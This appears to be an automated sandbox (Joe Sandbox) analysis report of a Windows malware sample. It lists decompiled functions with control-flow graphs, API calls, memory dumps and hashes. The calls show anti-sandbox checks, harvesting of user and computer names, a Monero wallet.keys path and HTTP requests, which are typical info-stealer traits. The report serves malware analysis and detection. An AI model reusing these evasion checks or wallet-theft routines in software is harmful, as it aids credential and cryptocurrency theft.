                                        Function 00985760 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1090 985760-9857c7 call 985d20 call 98ab30 * 3 call 98aa50 * 4 1106 9857cc-9857d3 1090->1106 1107 9857d5-985806 call 98ab30 call 98aab0 call 971590 call 985440 1106->1107 1108 985827-98589c call 98aa50 * 2 call 971590 call 985510 call 98abb0 call 98ab10 call 98ade0 StrCmpCA 1106->1108 1123 98580b-985822 call 98abb0 call 98ab10 1107->1123 1134 9858e3-9858f9 call 98ade0 StrCmpCA 1108->1134 1138 98589e-9858de call 98aab0 call 971590 call 985440 call 98abb0 call 98ab10 1108->1138 1123->1134 1139 985a2c-985a94 call 98abb0 call 98ab30 * 2 call 9716b0 call 98ab10 * 4 call 971670 call 971550 1134->1139 1140 9858ff-985906 1134->1140 1138->1134 1269 985d13-985d16 1139->1269 1142 985a2a-985aaf call 98ade0 StrCmpCA 1140->1142 1143 98590c-985913 1140->1143 1162 985be1-985c49 call 98abb0 call 98ab30 * 2 call 9716b0 call 98ab10 * 4 call 971670 call 971550 1142->1162 1163 985ab5-985abc 1142->1163 1146 98596e-9859e3 call 98aa50 * 2 call 971590 call 985510 call 98abb0 call 98ab10 call 98ade0 StrCmpCA 1143->1146 1147 985915-985969 call 98ab30 call 98aab0 call 971590 call 985440 call 98abb0 call 98ab10 1143->1147 1146->1142 1246 9859e5-985a25 call 98aab0 call 971590 call 985440 call 98abb0 call 98ab10 1146->1246 1147->1142 1162->1269 1168 985bdf-985c64 call 98ade0 StrCmpCA 1163->1168 1169 985ac2-985ac9 1163->1169 1198 985c78-985ce1 call 98abb0 call 98ab30 * 2 call 9716b0 call 98ab10 * 4 call 971670 call 971550 1168->1198 1199 985c66-985c71 Sleep 1168->1199 1175 985acb-985b1e call 98ab30 call 98aab0 call 971590 call 985440 call 98abb0 call 98ab10 1169->1175 1176 985b23-985b98 call 98aa50 * 2 call 971590 call 985510 call 98abb0 call 98ab10 call 98ade0 StrCmpCA 1169->1176 1175->1168 1176->1168 1274 985b9a-985bda call 98aab0 call 971590 call 985440 call 98abb0 call 98ab10 1176->1274 1198->1269 1199->1106 1246->1142 1274->1168
                                        APIs
                                          • Part of subcall function 0098AB30: lstrlen.KERNEL32(00974F55,?,?,00974F55,00990DDF), ref: 0098AB3B
                                          • Part of subcall function 0098AB30: lstrcpy.KERNEL32(00990DDF,00000000), ref: 0098AB95
                                          • Part of subcall function 0098AA50: lstrcpy.KERNEL32(00990E1A,00000000), ref: 0098AA98
                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00985894
                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 009858F1
                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00985AA7
                                          • Part of subcall function 0098AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0098AAF6
                                          • Part of subcall function 00985440: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00985478
                                          • Part of subcall function 0098ABB0: lstrcpy.KERNEL32(?,00990E1A), ref: 0098AC15
                                          • Part of subcall function 00985510: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00985568
                                          • Part of subcall function 00985510: lstrlen.KERNEL32(00000000), ref: 0098557F
                                          • Part of subcall function 00985510: StrStrA.SHLWAPI(00000000,00000000), ref: 009855B4
                                          • Part of subcall function 00985510: lstrlen.KERNEL32(00000000), ref: 009855D3
                                          • Part of subcall function 00985510: lstrlen.KERNEL32(00000000), ref: 009855FE
                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 009859DB
                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00985B90
                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00985C5C
                                        • Sleep.KERNEL32(0000EA60), ref: 00985C6B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpylstrlen$Sleep
                                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                        • API String ID: 507064821-2791005934
                                        • Opcode ID: 6935b953f0b48b532fe66052fead6f5230023a4f7cd4be2b634d645f6fee4c82
                                        • Instruction ID: 9134443768e4958f795bb32779c59bdd3989fe9c9960deca953a0c54bd6b1c4d
                                        • Opcode Fuzzy Hash: 6935b953f0b48b532fe66052fead6f5230023a4f7cd4be2b634d645f6fee4c82
                                        • Instruction Fuzzy Hash: 2BE141729101049BDB18FBA4DDA2FED737DBFD5300F408569B50666295EF386A0CCBA2
                                        Function 009819F0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1301 9819f0-981a1d call 98ade0 StrCmpCA 1304 981a1f-981a21 ExitProcess 1301->1304 1305 981a27-981a41 call 98ade0 1301->1305 1309 981a44-981a48 1305->1309 1310 981a4e-981a61 1309->1310 1311 981c12-981c1d call 98ab10 1309->1311 1312 981bee-981c0d 1310->1312 1313 981a67-981a6a 1310->1313 1312->1309 1315 981a99-981aa8 call 98ab30 1313->1315 1316 981afd-981b0e StrCmpCA 1313->1316 1317 981b1f-981b30 StrCmpCA 1313->1317 1318 981bdf-981be9 call 98ab30 1313->1318 1319 981a71-981a80 call 98ab30 1313->1319 1320 981aad-981abe StrCmpCA 1313->1320 1321 981acf-981ae0 StrCmpCA 1313->1321 1322 981bc0-981bd1 StrCmpCA 1313->1322 1323 981b41-981b52 StrCmpCA 1313->1323 1324 981ba1-981bb2 StrCmpCA 1313->1324 1325 981b82-981b93 StrCmpCA 1313->1325 1326 981b63-981b74 StrCmpCA 1313->1326 1327 981a85-981a94 call 98ab30 1313->1327 1315->1312 1331 981b1a 1316->1331 1332 981b10-981b13 1316->1332 1333 981b3c 1317->1333 1334 981b32-981b35 1317->1334 1318->1312 1319->1312 1350 981aca 1320->1350 1351 981ac0-981ac3 1320->1351 1329 981aee-981af1 1321->1329 1330 981ae2-981aec 1321->1330 1344 981bdd 1322->1344 1345 981bd3-981bd6 1322->1345 1335 981b5e 1323->1335 1336 981b54-981b57 1323->1336 1341 981bbe 1324->1341 1342 981bb4-981bb7 1324->1342 1339 981b9f 1325->1339 1340 981b95-981b98 1325->1340 1337 981b80 1326->1337 1338 981b76-981b79 1326->1338 1327->1312 1352 981af8 1329->1352 1330->1352 1331->1312 1332->1331 1333->1312 1334->1333 1335->1312 1336->1335 1337->1312 1338->1337 1339->1312 1340->1339 1341->1312 1342->1341 1344->1312 1345->1344 1350->1312 1351->1350 1352->1312
                                        APIs
                                        • StrCmpCA.SHLWAPI(00000000,block), ref: 00981A15
                                        • ExitProcess.KERNEL32 ref: 00981A21
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExitProcess
                                        • String ID: block
                                        • API String ID: 621844428-2199623458
                                        • Opcode ID: 950c9abf7fba66cc303ee6568c990ace2bdc01f651bc3221333ec285c1899944
                                        • Instruction ID: a19ac430a39d176732bae5057258ff4a714e76c27c49200681e02deccaf9410c
                                        • Opcode Fuzzy Hash: 950c9abf7fba66cc303ee6568c990ace2bdc01f651bc3221333ec285c1899944
                                        • Instruction Fuzzy Hash: F6513778A08209EFDB14EFA4D944FAE77BDBF84704F104549E812AB384E774E942CB61
                                        Function 00986C90 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 00989BB0: GetProcAddress.KERNEL32(76210000,01811578), ref: 00989BF1
                                          • Part of subcall function 00989BB0: GetProcAddress.KERNEL32(76210000,018115D8), ref: 00989C0A
                                          • Part of subcall function 00989BB0: GetProcAddress.KERNEL32(76210000,018115A8), ref: 00989C22
                                          • Part of subcall function 00989BB0: GetProcAddress.KERNEL32(76210000,01811710), ref: 00989C3A
                                          • Part of subcall function 00989BB0: GetProcAddress.KERNEL32(76210000,018115C0), ref: 00989C53
                                          • Part of subcall function 00989BB0: GetProcAddress.KERNEL32(76210000,01818938), ref: 00989C6B
                                          • Part of subcall function 00989BB0: GetProcAddress.KERNEL32(76210000,01805628), ref: 00989C83
                                          • Part of subcall function 00989BB0: GetProcAddress.KERNEL32(76210000,018054C8), ref: 00989C9C
                                          • Part of subcall function 00989BB0: GetProcAddress.KERNEL32(76210000,01811638), ref: 00989CB4
                                          • Part of subcall function 00989BB0: GetProcAddress.KERNEL32(76210000,01811608), ref: 00989CCC
                                          • Part of subcall function 00989BB0: GetProcAddress.KERNEL32(76210000,01811740), ref: 00989CE5
                                          • Part of subcall function 00989BB0: GetProcAddress.KERNEL32(76210000,01811650), ref: 00989CFD
                                          • Part of subcall function 00989BB0: GetProcAddress.KERNEL32(76210000,018056A8), ref: 00989D15
                                          • Part of subcall function 00989BB0: GetProcAddress.KERNEL32(76210000,01811758), ref: 00989D2E
                                          • Part of subcall function 0098AA50: lstrcpy.KERNEL32(00990E1A,00000000), ref: 0098AA98
                                          • Part of subcall function 009711D0: ExitProcess.KERNEL32 ref: 00971211
                                          • Part of subcall function 00971160: GetSystemInfo.KERNEL32(?), ref: 0097116A
                                          • Part of subcall function 00971160: ExitProcess.KERNEL32 ref: 0097117E
                                          • Part of subcall function 00971110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0097112B
                                          • Part of subcall function 00971110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00971132
                                          • Part of subcall function 00971110: ExitProcess.KERNEL32 ref: 00971143
                                          • Part of subcall function 00971220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0097123E
                                          • Part of subcall function 00971220: __aulldiv.LIBCMT ref: 00971258
                                          • Part of subcall function 00971220: __aulldiv.LIBCMT ref: 00971266
                                          • Part of subcall function 00971220: ExitProcess.KERNEL32 ref: 00971294
                                          • Part of subcall function 00986A10: GetUserDefaultLangID.KERNEL32 ref: 00986A14
                                          • Part of subcall function 00971190: ExitProcess.KERNEL32 ref: 009711C6
                                          • Part of subcall function 009879E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009711B7), ref: 00987A10
                                          • Part of subcall function 009879E0: RtlAllocateHeap.NTDLL(00000000), ref: 00987A17
                                          • Part of subcall function 009879E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00987A2F
                                          • Part of subcall function 00987A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00987AA0
                                          • Part of subcall function 00987A70: RtlAllocateHeap.NTDLL(00000000), ref: 00987AA7
                                          • Part of subcall function 00987A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00987ABF
                                          • Part of subcall function 0098ACC0: lstrlen.KERNEL32(?,01818C08,?,\Monero\wallet.keys,00990E1A), ref: 0098ACD5
                                          • Part of subcall function 0098ACC0: lstrcpy.KERNEL32(00000000), ref: 0098AD14
                                          • Part of subcall function 0098ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0098AD22
                                          • Part of subcall function 0098ABB0: lstrcpy.KERNEL32(?,00990E1A), ref: 0098AC15
                                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,018188E8,?,009910F4,?,00000000,?,009910F8,?,00000000,00990AF3), ref: 00986D6A
                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00986D88
                                        • CloseHandle.KERNEL32(00000000), ref: 00986D99
                                        • Sleep.KERNEL32(00001770), ref: 00986DA4
                                        • CloseHandle.KERNEL32(?,00000000,?,018188E8,?,009910F4,?,00000000,?,009910F8,?,00000000,00990AF3), ref: 00986DBA
                                        • ExitProcess.KERNEL32 ref: 00986DC2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                        • String ID:
                                        • API String ID: 2525456742-0
                                        • Opcode ID: 7712354ddea8c82c186d1aa27331812d92d9f3f705f9ebb54a73c4ed123bbbd2
                                        • Instruction ID: 39a7816c7c3cbb0501785367b511d96707b5dd5c875686791d4fbcf392f99ae5
                                        • Opcode Fuzzy Hash: 7712354ddea8c82c186d1aa27331812d92d9f3f705f9ebb54a73c4ed123bbbd2
                                        • Instruction Fuzzy Hash: C231E971A04208ABEB04FBF0DC57BFE7379BF94300F504959F516A6292DF786A058762
                                        Function 00971220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1436 971220-971247 call 988b40 GlobalMemoryStatusEx 1439 971273-97127a 1436->1439 1440 971249-971271 call 98dd30 * 2 1436->1440 1442 971281-971285 1439->1442 1440->1442 1444 971287 1442->1444 1445 97129a-97129d 1442->1445 1447 971292-971294 ExitProcess 1444->1447 1448 971289-971290 1444->1448 1448->1445 1448->1447
                                        APIs
                                        • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0097123E
                                        • __aulldiv.LIBCMT ref: 00971258
                                        • __aulldiv.LIBCMT ref: 00971266
                                        • ExitProcess.KERNEL32 ref: 00971294
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                        • String ID: @
                                        • API String ID: 3404098578-2766056989
                                        • Opcode ID: 4bac285f46720f8e1ab782c2d3c44b5b0efbf8a7ef5b4599469789a1f28c16fc
                                        • Instruction ID: e7279094de3b0064ecdc1ca0020498e4e1594042cdee29e8e5b5d815cb626913
                                        • Opcode Fuzzy Hash: 4bac285f46720f8e1ab782c2d3c44b5b0efbf8a7ef5b4599469789a1f28c16fc
                                        • Instruction Fuzzy Hash: 5C016DB1D44308BBEB10EFE4CC4ABAEBB78AF54705F208448E708B62C1D77455418B59
                                        Function 00986D93 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1450 986d93 1451 986daa 1450->1451 1453 986d5a-986d77 call 98ade0 OpenEventA 1451->1453 1454 986dac-986dc2 call 986bc0 call 985d60 CloseHandle ExitProcess 1451->1454 1459 986d79-986d91 call 98ade0 CreateEventA 1453->1459 1460 986d95-986da4 CloseHandle Sleep 1453->1460 1459->1454 1460->1451
                                        APIs
                                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,018188E8,?,009910F4,?,00000000,?,009910F8,?,00000000,00990AF3), ref: 00986D6A
                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00986D88
                                        • CloseHandle.KERNEL32(00000000), ref: 00986D99
                                        • Sleep.KERNEL32(00001770), ref: 00986DA4
                                        • CloseHandle.KERNEL32(?,00000000,?,018188E8,?,009910F4,?,00000000,?,009910F8,?,00000000,00990AF3), ref: 00986DBA
                                        • ExitProcess.KERNEL32 ref: 00986DC2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                        • String ID:
                                        • API String ID: 941982115-0
                                        • Opcode ID: 690f15b86e2ec073859ee7d079f19d4185eb862c7eff4f78ca111f5f132a5f1c
                                        • Instruction ID: f38b923b80b8ffb272a0f4d203c13c7f61bd828b3ebcc81ef699e1d3cd8e4eeb
                                        • Opcode Fuzzy Hash: 690f15b86e2ec073859ee7d079f19d4185eb862c7eff4f78ca111f5f132a5f1c
                                        • Instruction Fuzzy Hash: D0F01C34A48209EFEB10BBA0DC0ABBE77B8BF45742F100A15B516A93D1CBB45501DBA5
                                        Function 00974800 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00974889
                                        • InternetCrackUrlA.WININET(00000000,00000000), ref: 00974899
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CrackInternetlstrlen
                                        • String ID: <
                                        • API String ID: 1274457161-4251816714
                                        • Opcode ID: cc92581192b19d9fc2c3b87d01c090b1a469efd22964dcd94e201d362ee83ec8
                                        • Instruction ID: 56f47546ade7a2a8b60ad9f4e19535ee2117d9e75c1294b813381659a5a3af01
                                        • Opcode Fuzzy Hash: cc92581192b19d9fc2c3b87d01c090b1a469efd22964dcd94e201d362ee83ec8
                                        • Instruction Fuzzy Hash: F8214DB1D00209ABDF14EFA4E845BDE7B75FB45320F108625F929A72C0EB706A09CF91
                                        Function 00985440 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 0098AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0098AAF6
                                          • Part of subcall function 009762D0: InternetOpenA.WININET(00990DFF,00000001,00000000,00000000,00000000), ref: 00976331
                                          • Part of subcall function 009762D0: StrCmpCA.SHLWAPI(?,0181FCB0), ref: 00976353
                                          • Part of subcall function 009762D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00976385
                                          • Part of subcall function 009762D0: HttpOpenRequestA.WININET(00000000,GET,?,0181F008,00000000,00000000,00400100,00000000), ref: 009763D5
                                          • Part of subcall function 009762D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0097640F
                                          • Part of subcall function 009762D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00976421
                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00985478
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
